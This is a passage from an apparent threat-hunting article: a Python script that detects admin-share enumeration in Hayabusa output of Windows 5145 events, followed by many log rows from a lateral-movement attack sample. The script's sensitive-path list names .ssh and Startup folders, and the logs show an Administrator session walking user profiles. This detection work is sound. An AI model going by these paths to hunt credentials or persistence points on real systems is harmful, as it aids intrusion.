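2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635
"""

# Example-only heuristic (assumption, not a Hayabusa rule): path fragments whose
# remote read is worth calling out regardless of volume.
SENSITIVE_FRAGMENTS = (r"\.ssh", r"\Start Menu\Programs\Startup")


def parse_details(details):
    """Split a Hayabusa 'Key: Value | Key: Value' Details string into a dict."""
    fields = {}
    for part in details.split(" | "):
        key, sep, value = part.partition(": ")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def load_events(csv_text):
    """Return the EventID 5145 rows with a parsed timestamp and the Details fields."""
    events = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["EventID"] != "5145":
            continue
        ts = datetime.strptime(row["Timestamp"], "%Y-%m-%d %H:%M:%S.%f %z")
        events.append({"ts": ts, "computer": row["Computer"], **parse_details(row["Details"])})
    return events


def find_share_enumeration(events, min_paths=5, window=timedelta(seconds=1)):
    """Flag (computer, LID, source IP, share) tuples that read at least min_paths
    distinct paths on an admin share (name ending in $) within one window."""
    by_session = defaultdict(list)
    for e in events:
        if not e.get("Share Name", "").endswith("$"):
            continue
        by_session[(e["computer"], e.get("LID"), e.get("IP Addr"), e["Share Name"])].append(e)

    findings = []
    for (computer, lid, ip, share), evs in by_session.items():
        evs.sort(key=lambda e: e["ts"])
        best, start = 0, 0
        # Two-pointer sliding window over the time-sorted events of one session.
        for end in range(len(evs)):
            while evs[end]["ts"] - evs[start]["ts"] > window:
                start += 1
            best = max(best, len({e["Path"] for e in evs[start:end + 1]}))
        if best >= min_paths:
            sensitive = sorted({e["Path"] for e in evs
                                if any(frag in e["Path"] for frag in SENSITIVE_FRAGMENTS)})
            findings.append({
                "computer": computer, "lid": lid, "ip": ip, "share": share,
                "max_distinct_paths_in_window": best,
                "first": evs[0]["ts"], "last": evs[-1]["ts"],
                "sensitive_paths": sensitive,
            })
    return findings


if __name__ == "__main__":
    for f in find_share_enumeration(load_events(SAMPLE_CSV)):
        print(f"{f['computer']} {f['share']} read from {f['ip']} (LID {f['lid']}): "
              f"{f['max_distinct_paths_in_window']} distinct paths within 1s, "
              f"sensitive: {f['sensitive_paths']}")
```

Keying on the LID rather than the account name is deliberate: the same network logon session carries every 5145 of one SMB connection, so a single logon touching dozens of profile directories is a much stronger signal than the "Administrator" user string, which is also what legitimate admin tooling uses. Run against the full Hayabusa CSV (with the extra columns present) the logic is unchanged, since DictReader ignores columns it is not asked for.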
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.777 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Saved Games | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Searches | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Administrator.EXAMPLE\Videos | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.787 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.797 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.807 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Searches\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Videos\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.817 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\.ssh | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Contacts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.827 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.837 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\New folder | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.847 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\RDPWrap-v1.6.2 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.857 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\translations | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.867 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\garbage | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x32\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.877 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64 | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\db | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\memdumps | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\platforms | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.887 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\release\x64\plugins | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
2019-03-18 23:23:23.897
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Desktop\winrar-cve | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Documents | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Downloads | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.897 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links\desktop.ini | IP Addr: 10.0.2.15 | LID: 
0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States\desktop.ini | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Favorites\Links for United States | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Links | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.907 
+09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Music | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Pictures | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx 2019-03-18 23:23:23.917 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\IEUser\Saved Games | IP Addr: 10.0.2.15 | LID: 